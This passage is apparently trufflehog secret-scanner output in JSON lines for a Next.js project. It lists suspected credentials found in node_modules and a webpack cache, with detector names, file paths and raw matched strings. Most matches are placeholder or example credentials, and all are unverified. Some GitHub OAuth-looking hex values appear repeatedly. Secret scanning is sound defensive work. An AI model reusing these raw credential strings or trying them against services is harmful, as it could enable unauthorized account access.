authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":252577}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/@types/node/http.d.ts","line":1790}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"http://abc:xyz@example.com","RawV2":"http://abc:xyz@example.com","Redacted":"http://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/@types/node/https.d.ts","line":428}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"https://abc:xyz@example.com","RawV2":"https://abc:xyz@example.com","Redacted":"https://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/@types/node/url.d.ts","line":722}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"https://123:xyz@example.com","RawV2":"https://123:xyz@example.com","Redacted":"https://123:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/@types/node/url.d.ts","line":716}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"https://abc:xyz@example.com","RawV2":"https://abc:xyz@example.com","Redacted":"https://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/@types/node/url.d.ts","line":722}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"https://123:xyz@example.com","RawV2":"https://123:xyz@example.com","Redacted":"https://123:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/@types/node/url.d.ts","line":551}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"https://abc:xyz@example.com","RawV2":"https://abc:xyz@example.com","Redacted":"https://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/@types/node/url.d.ts","line":557}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"https://abc:123@example.com","RawV2":"https://abc:123@example.com","Redacted":"https://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/@types/node/url.d.ts","line":551}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"https://abc:xyz@example.com","RawV2":"https://abc:xyz@example.com","Redacted":"https://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/faye-websocket/README.md","line":122}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup proxy.example.com on 192.168.65.7:53: no such host","VerificationFromCache":false,"Raw":"http://username:password@proxy.example.com","RawV2":"http://username:password@proxy.example.com","Redacted":"http://username:********@proxy.example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts","line":429}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"https://abc:xyz@example.com","RawV2":"https://abc:xyz@example.com","Redacted":"https://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts","line":1817}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"http://abc:xyz@example.com","RawV2":"http://abc:xyz@example.com","Redacted":"http://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts","line":1817}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"http://abc:xyz@example.com","RawV2":"http://abc:xyz@example.com","Redacted":"http://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts","line":736}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"ESCAPED_UNICODE","Verified":false,"VerificationFromCache":true,"Raw":"https://abc:xyz@example.com","RawV2":"https://abc:xyz@example.com","Redacted":"https://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts","line":742}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"https://123:xyz@example.com","RawV2":"https://123:xyz@example.com","Redacted":"https://123:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts","line":742}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"https://123:xyz@example.com","RawV2":"https://123:xyz@example.com","Redacted":"https://123:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts","line":577}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"https://abc:123@example.com","RawV2":"https://abc:123@example.com","Redacted":"https://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts","line":571}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"https://abc:xyz@example.com","RawV2":"https://abc:xyz@example.com","Redacted":"https://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts","line":571}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"https://abc:xyz@example.com","RawV2":"https://abc:xyz@example.com","Redacted":"https://abc:********@example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/google-auth-library/README.md","line":323}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":6,"DetectorName":"GCP","DetectorDescription":"GCP (Google Cloud Platform) is a suite of cloud computing services that runs on the same infrastructure that Google uses internally for its end-user products. GCP keys can be used to access and manage these services.","DecoderName":"PLAIN","Verified":false,"VerificationError":"private key should be a PEM or plain PKCS1 or PKCS8; parse error: asn1: structure error: tags don't match (16 vs {class:1 tag:25 length:111 isCompound:true}) {optional:false explicit:false application:false private:false defaultValue:\u003cnil\u003e tag:\u003cnil\u003e stringType:0 timeType:0 set:false omitEmpty:false} pkcs1PrivateKey @2","VerificationFromCache":false,"Raw":"your-client-email","RawV2":"{\"type\":\"service_account\",\"project_id\":\"your-project-id\",\"private_key_id\":\"your-private-key-id\",\"private_key\":\"your-private-key\",\"client_email\":\"your-client-email\",\"client_id\":\"your-client-id\",\"auth_uri\":\"https://accounts.google.com/o/oauth2/auth\",\"token_uri\":\"https://accounts.google.com/o/oauth2/token\",\"auth_provider_x509_cert_url\":\"https://www.googleapis.com/oauth2/v1/certs\",\"client_x509_cert_url\":\"your-cert-url\"}","Redacted":"your-client-email","ExtraData":{"private_key_id":"your-private-key-id","project":"your-project-id","rotation_guide":"https://howtorotate.com/docs/tutorials/gcp/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/ip-address/README.md","line":1}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":4,"DetectorName":"Circle","DetectorDescription":"CircleCI is a continuous integration and delivery platform used to build, test, and deploy software. CircleCI tokens can be used to interact with the CircleCI API and access various resources and functionalities.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"7baede7efd3db5f1f25fb439e97d5f695ff76318","RawV2":"","Redacted":"","ExtraData":{"Version":"1"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/prisma/build/index.js","line":1568}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":895,"DetectorName":"MongoDB","DetectorDescription":"MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup _mongodb._tcp.cluster0.ab1cd.mongodb.net on 192.168.65.7:53: no such host","VerificationFromCache":false,"Raw":"mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true\u0026w=majority","RawV2":"","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/mongo/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/keyv/README.md","line":58}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":895,"DetectorName":"MongoDB","DetectorDescription":"MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.","DecoderName":"PLAIN","Verified":false,"VerificationError":"context deadline exceeded","VerificationFromCache":false,"Raw":"mongodb://user:pass@localhost:27017/dbname","RawV2":"","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/mongo/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/websocket-driver/README.md","line":177}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup proxy.example.com on 192.168.65.7:53: no such host","VerificationFromCache":true,"Raw":"http://username:password@proxy.example.com","RawV2":"http://username:password@proxy.example.com","Redacted":"http://username:********@proxy.example.com","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/zod/src/v4/classic/tests/string.test.ts","line":307}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"https://anonymous:flabada@developer.mozilla.org","RawV2":"https://anonymous:flabada@developer.mozilla.org/en","Redacted":"https://anonymous:********@developer.mozilla.org/en","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/zod/src/v4/classic/tests/string.test.ts","line":303}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":17,"DetectorName":"URI","DetectorDescription":"This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"https://anonymous:flabada@developer.mozilla.org","RawV2":"https://anonymous:flabada@developer.mozilla.org/en","Redacted":"https://anonymous:********@developer.mozilla.org/en","ExtraData":null,"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/is-url/test/index.js","line":68}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"i/o timeout","VerificationFromCache":false,"Raw":"postgres://u:p@example.com:5702","RawV2":"postgres://u:p@example.com:5702","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript027a6365b737e13116811a8ef43670196e1fa00a","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScripta5edc328ecb3f90d1ba09cfe70a0040f68adf50a","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript7293ad50d20ea0fb7dd1ac9b925e90e1bd95dea8","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptb9409da199ebca515a848489c206b807fab2e65d","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript8aae3332251d09fa136db17ef4a40d83fa052bc4","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptd0e437912917d6a66bb5128992fa2f566a5f830b","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript1d4cca395a98b395e6318f0505fc73bef8b01350","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScripta03a320dbf5c0ce33d829a857fc04a651c0bb53e","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptd585b303a43746201b05c9c9fda94a444634df33","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript0b5b1b0e5f4f9baf393c48e9cc2bc85c1b67a47a","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptacc16de6b846ea7332db753646a9cec76b589162","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScriptecfc2c474575c6cdbc6d273c94c13181bd1dbaa6","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript18b0b752424bf560271e670ff95a0f90c8386787","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md","line":164}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"showCompletionScript","RawV2":"showCompletionScript94fa38cbab8d86943e87bf41d368ed56dffa6835","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} 